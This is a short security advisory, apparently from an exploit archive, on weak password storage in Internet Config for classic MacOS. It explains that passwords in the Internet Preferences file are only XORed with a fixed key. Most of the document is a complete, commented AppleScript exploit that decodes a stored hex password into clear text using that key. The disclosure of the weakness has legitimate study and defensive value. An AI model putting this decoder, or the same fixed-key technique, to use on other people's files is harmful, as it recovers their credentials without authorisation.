Internet Config for MacOS Weak Password Encryption Vulnerability

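Find an encrypted password in the Internet Preferences file in the Preferences folder using a resource editor such as ResEdit. Discard the first byte, as it is merely the length of the password. As the script below shows, the remaining bytes are the password combined bit-for-bit with a fixed key, so the stored value is obfuscated rather than encrypted, and the preferences file should be treated as if it held the password in clear text.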
AppleScript exploit by Dawid adix Adamski:

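(* IC Pass 2.1 by adix 21.07.99; Apple Script English *)
-- Decodes a stored Internet Config password, typed in as hexadecimal digits,
-- by XORing it bit by bit with the fixed key string below.
-- The key is a constant, so the stored value is obfuscated rather than
-- encrypted: read access to the preferences file is enough to recover it.

-- The dialog call was split over two lines in this listing with no
-- continuation character; it is rejoined here so the statement parses.
set hex1 to text returned of (display dialog "Enter encrypted password:" default answer "" buttons {" Ok "} default button " Ok ")
-- Fixed key written as a string of bits: 80 characters, i.e. 10 key bytes.
set Alicia to "01010110010101110101100001011001010110100101101101011100010111010101111001011111"
set pass to "" -- decoded characters accumulate here
set i to 1 -- position of the current hex digit pair in hex1
set skok to 0 -- bit offset into the key; grows by 8 per decoded byte
set ile to count items in hex1 -- number of characters entered
if ile = 1 or ile = 0 then
    -- Fewer than two hex digits: there is no complete byte to decode.
    set pass to ""
else
    -- Walk the input one byte (two hex digits) at a time; an odd trailing
    -- digit is never read.
    -- NOTE(review): the key holds only 80 bits, so input longer than 10 bytes
    -- makes `item (a + skok) of Alicia` index past its end. Confirm how longer
    -- passwords are stored.
    repeat until (i > (ile - 1))
        set kodascii to 0
        set zn to items (i) thru (i + 1) in hex1
        set lbin to hex2bin(zn) as string
        repeat with a from 1 to 8
            set bit2 to item (a + skok) of Alicia
            set bit1 to item a of lbin
            -- XOR of the input bit and the key bit.
            if (bit1 = bit2) then
                set bitk to "0"
            else
                set bitk to "1"
            end if
            -- Weight the bit by its position, most significant bit first.
            set kodascii to {kodascii + bitk * (2 ^ (8 - a))}
        end repeat
        set pass to {pass & (ASCII character kodascii)}
        set skok to skok + 8
        set i to i + 2
    end repeat
end if
display dialog "Password: " & pass & return & return & "by adix" buttons {" Ok "} default button " Ok "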
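-- hex2bin: turns a list of hexadecimal digit characters into one string of
-- bits, four bits per digit, in the order the digits are given.
--   zn: list of single characters, each expected to be in "0123456789ABCDEF"
--   returns: a string of "0"/"1" characters, 4 * (count of zn) long
--   errors: if a character is not a hexadecimal digit
-- NOTE(review): AppleScript compares strings without regard to case by
-- default, so lowercase a-f presumably match too. Confirm on the target
-- system.
on hex2bin(zn)
    set temphex to {"0000", "0001", "0010", "0011", "0100", "0101", "0110", "0111", "1000", "1001", "1010", "1011", "1100", "1101", "1110", "1111"}
    set t2hex to "0123456789ABCDEF"
    set bin to "" as string
    repeat with j in zn
        set t1 to j as string
        -- Reset for each digit. Without this, a non-hex character would reuse
        -- the previous digit's bits, or fail on an undefined variable if it
        -- came first.
        set temp to missing value
        repeat with i from 1 to (count items in t2hex)
            if ((item i in t2hex) = t1) then
                set temp to (item i in temphex)
                exit repeat
            end if
        end repeat
        if temp is missing value then error "hex2bin: not a hexadecimal digit: " & t1
        set bin to {bin & temp} as string
    end repeat
    return (bin)
end hex2bin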


 
